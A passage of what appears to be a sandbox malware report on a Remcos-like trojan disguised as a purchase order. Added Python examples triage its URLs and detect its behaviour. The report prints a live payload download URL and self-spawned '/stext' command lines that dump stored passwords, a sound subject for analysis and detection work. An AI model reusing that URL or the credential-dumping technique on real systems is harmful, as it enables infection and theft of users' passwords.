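Almost every URL in the list above comes from bhv2E52.tmp, a dropped file (the .dr suffix) holding Microsoft sign-in, OneDrive and Office CDN addresses, i.e. browser-cache noise. The rows that matter are the ones whose source is the sample's own process memory (.sdmp regions of process 2): the healthselflesssupplies.co.za download URL for the .bin payload, reported three times because the string scanner read past the terminator (".bin", ".bin_I", ".binfH"), alongside the single TLS 1.2 session the report records. The Python below is an added triage example written for this page, not part of the Joe Sandbox report or of its tooling: it parses rows in this format (fused or pipe-separated columns), collapses the over-read variants, records where each string was found and drops hosts on an allowlist. The allowlist of benign host suffixes and the list of payload extensions are assumptions made for the example; the sample rows are copied from the report.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: rows copied from the report's "String found in binary or
# memory" list. The source and detail columns may be fused together (as extracted)
# or separated by " | "; ROW_RE accepts both forms.
SAMPLE_ROWS = """
Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhv2E52.tmp.6.dr | String found in binary or memory: https://www.office.com/
Source: Purchase-Order27112024.scr.exeString found in binary or memory: https://login.yahoo.com/config/login
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063A8000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4580580413.0000000008020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin_I
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.binfH
"""

ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)$"
)

# Over-read suffixes: the scanner kept reading bytes after the real URL ended, so
# ".bin_I" and ".binfH" are the same indicator as ".bin". The extension list is an
# assumption for this example; extend it for the payload types you care about.
PAYLOAD_EXT_RE = re.compile(
    r"^(?P<base>https?://\S+?\.(?:bin|exe|dll|dat|ps1|vbs|zip))\S*$", re.IGNORECASE
)

# Assumed allowlist: Microsoft/Office telemetry and CDN hosts seen in the dropped
# browser-cache artifact, plus the login pages that password-recovery code embeds
# as constants. Tune it to your own environment.
BENIGN_SUFFIXES = (
    "microsoft.com", "microsoft.net", "office.net", "office.com", "msauth.net",
    "azureedge.net", "msedge.net", "live.com", "digicert.com", "sfx.ms",
    "nelreports.net", "google.com", "yahoo.com",
)


def canonical_url(url: str) -> str:
    """Trim over-read bytes after a recognised payload extension."""
    m = PAYLOAD_EXT_RE.match(url)
    return m["base"] if m else url


def host_is_allowlisted(url: str) -> bool:
    host = (urlsplit(url).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def origin_of(source_token: str) -> str:
    """Map a Joe Sandbox source token to where the string was actually found."""
    if source_token.endswith(".sdmp"):
        return "process memory"
    if source_token.endswith(".dr"):
        return "dropped file"
    return "sample file"


def defang(url: str) -> str:
    """hxxps://www[.]example[.]com/... form for sharing indicators safely."""
    parts = urlsplit(url)
    host = (parts.hostname or "").replace(".", "[.]")
    rest = url.split(parts.netloc, 1)[1] if parts.netloc else ""
    return f"{parts.scheme.replace('http', 'hxxp')}://{host}{rest}"


def triage(rows: str):
    """Return the non-allowlisted URLs with every origin they were seen in."""
    origins = defaultdict(set)
    for line in rows.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        url = canonical_url(m["url"])
        for token in m["src"].split(", "):
            origins[url].add(origin_of(token.strip()))
    findings = []
    for url in sorted(origins):
        if host_is_allowlisted(url):
            continue
        findings.append({"url": url, "defanged": defang(url),
                         "origins": sorted(origins[url])})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f['defanged']}  <- {', '.join(f['origins'])}")
```

Run over the constructed rows, the two healthselflesssupplies.co.za entries survive, both marked as found in process memory and in the sample file, while the Microsoft and Yahoo strings are discarded. Treat the allowlist as a noise filter, not a verdict: a benign domain can still host a payload, which is why the origin column is kept in the output.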
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

E-Banking Fraud

Source: Yara match | File source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR

System Summary

Source: initial sample | Static PE information: Filename: Purchase-Order27112024.scr.exe
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00401806 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_004018C0 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_004016FD NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_004017B7 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00402CAC NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00402D66 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_00404B6E
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_0040659D
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_00404B6E
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_0040659D
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37017194
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_3700B5C1
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044B040
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0043610D
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00447310
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044A490
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0040755A
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0043C560
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044B610
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044D6C0
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_004476F0
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044B870
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044081D
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00414957
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_004079EE
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00407AEB
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044AA80
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00412AA9
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00404B74
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00404B03
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0044BBD8
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00404BE5
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00404C76
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00415CFE
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00416D72
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00446D30
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00446D8B
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00406E8F
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00405038
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0041208C
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_004050A9
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0040511A
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0043C13A
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_004051AB
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00449300
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0040D322
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0044A4F0
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0043A5AB
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00413631
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00446690
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0044A730
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_004398D8
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_004498E0
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0044A886
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0043DA09
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00438D5E
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00449ED0
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_0041FE83
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00430F54
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_004050C2
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_004014AB
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00405133
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_004051A4
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00401246
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_0040CA46
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00405235
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_004032C8
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_004222D9
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00401689
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00402F60
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: String function: 00416760 appears 69 times
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: String function: 00402B3A appears 51 times
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4580067964.000000000647F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2559567010.00000000369B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2586800551.0000000006459000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2559398805.0000000006459000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FEB000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2586800551.000000000646D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe | Binary or memory string: OriginalFileName vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe | Binary or memory string: OriginalFilename vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.000000000041B000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Purchase-Order27112024.scr.exe
Source: Purchase-Order27112024.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@9/14@4/3
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_0040206A CoCreateInstance
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File created: C:\Users\user\AppData\Local\googly
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-B4UZRV
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File created: C:\Users\user\AppData\Local\Temp\nsa77F2.tmp
Source: Purchase-Order27112024.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600683206.0000000036EE0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Purchase-Order27112024.scr.exe, 00000006.00000002.2587394804.0000000002765000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | File read: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_7-33221
Source: unknown | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn"
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll"
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Process created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs"
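The process creations above are the mechanism behind the credential-theft signatures: after the first self-spawn, the sample launches three more copies of its own image with `/stext "<random name under Temp>"`, the switch NirSoft password-recovery tools use to write their results to a text file (the OriginalFilename mspass.exe strings listed earlier identify one of them, MessenPass, in process 2's memory), and the Remcos process registers the mutex Rmc-B4UZRV. Two behaviours are cheap to detect from ordinary endpoint telemetry: a process creating a child with the same image path and a `/stext` argument, and a mutex matching the Remcos naming pattern. The Python below is an added detection example written for this page, not Joe Sandbox or Remcos code. The event records are constructed to mirror the rows above, the field names follow Sysmon process-creation conventions, and the mutex pattern ("Rmc-" plus six alphanumerics) is an assumption generalised from the single value this report shows.

```python
import re

SAMPLE = r"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"

# Constructed event records mirroring the "Process created" and "Mutant created"
# rows of the report. Field names follow Sysmon Event ID 1 conventions; the
# MutexCreate record is a sandbox-style event, since Sysmon does not log mutexes.
EVENTS = [
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": SAMPLE, "CommandLine": f'"{SAMPLE}"'},
    {"EventType": "ProcessCreate", "ParentImage": SAMPLE,
     "Image": SAMPLE, "CommandLine": f'"{SAMPLE}"'},
    {"EventType": "ProcessCreate", "ParentImage": SAMPLE, "Image": SAMPLE,
     "CommandLine": SAMPLE + r' /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn"'},
    {"EventType": "ProcessCreate", "ParentImage": SAMPLE, "Image": SAMPLE,
     "CommandLine": SAMPLE + r' /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll"'},
    {"EventType": "ProcessCreate", "ParentImage": SAMPLE, "Image": SAMPLE,
     "CommandLine": SAMPLE + r' /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs"'},
    {"EventType": "MutexCreate", "Image": SAMPLE,
     "MutexName": r"\Sessions\1\BaseNamedObjects\Rmc-B4UZRV"},
    # Control case: an administrator running the same NirSoft switch by hand from
    # cmd.exe. Parent and child images differ, so the self-spawn rule stays quiet.
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Tools\WebBrowserPassView.exe",
     "CommandLine": r"WebBrowserPassView.exe /stext C:\Tools\browser-passwords.txt"},
]

# /stext <file> is the NirSoft "save report as text" switch; the path may be quoted or bare.
STEXT_RE = re.compile(r'/stext\s+(?:"(?P<quoted>[^"]+)"|(?P<bare>\S+))', re.IGNORECASE)
# Assumption for this example: Remcos names its mutex "Rmc-" plus six upper-case
# alphanumerics, generalised from the single value Rmc-B4UZRV in this report.
REMCOS_MUTEX_RE = re.compile(r"(?:^|\\)Rmc-[A-Z0-9]{6}$")
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

RULE_STEXT = "self-spawned /stext credential dump"
RULE_MUTEX = "Remcos default mutex"


def stext_target(cmdline: str):
    """Return the output path handed to /stext, or None if the switch is absent."""
    m = STEXT_RE.search(cmdline)
    if not m:
        return None
    return m["quoted"] or m["bare"]


def is_self_spawn(ev: dict) -> bool:
    """True when a process starts a second copy of its own image, the hollowed
    child that Remcos fills with the recovery tool."""
    return ev["ParentImage"].lower() == ev["Image"].lower()


def detect(events):
    """Run both rules over a list of event records and return the alerts raised."""
    alerts = []
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            target = stext_target(ev["CommandLine"])
            if target is None or not is_self_spawn(ev):
                continue
            # Output under %LOCALAPPDATA%\Temp with a random name is the malware
            # pattern; any other location still deserves a look, at lower priority.
            severity = "high" if TEMP_DIR_RE.search(target) else "medium"
            alerts.append({"rule": RULE_STEXT, "severity": severity,
                           "image": ev["Image"], "output": target})
        elif ev["EventType"] == "MutexCreate":
            if REMCOS_MUTEX_RE.search(ev["MutexName"]):
                alerts.append({"rule": RULE_MUTEX, "severity": "high",
                               "image": ev["Image"], "output": ev["MutexName"]})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a['severity']}] {a['rule']}: {a['image']} -> {a['output']}")
```

On the constructed events the self-spawn rule fires three times, once per dump file, and the mutex rule once; the administrator's manual WebBrowserPassView run raises nothing. The self-spawn check is the important half: the injected tool never touches disk under its own name, so image-name or hash rules miss it, while a process launching its own path with `/stext` has no legitimate counterpart.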
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Section loaded: kernel.appcore.dll
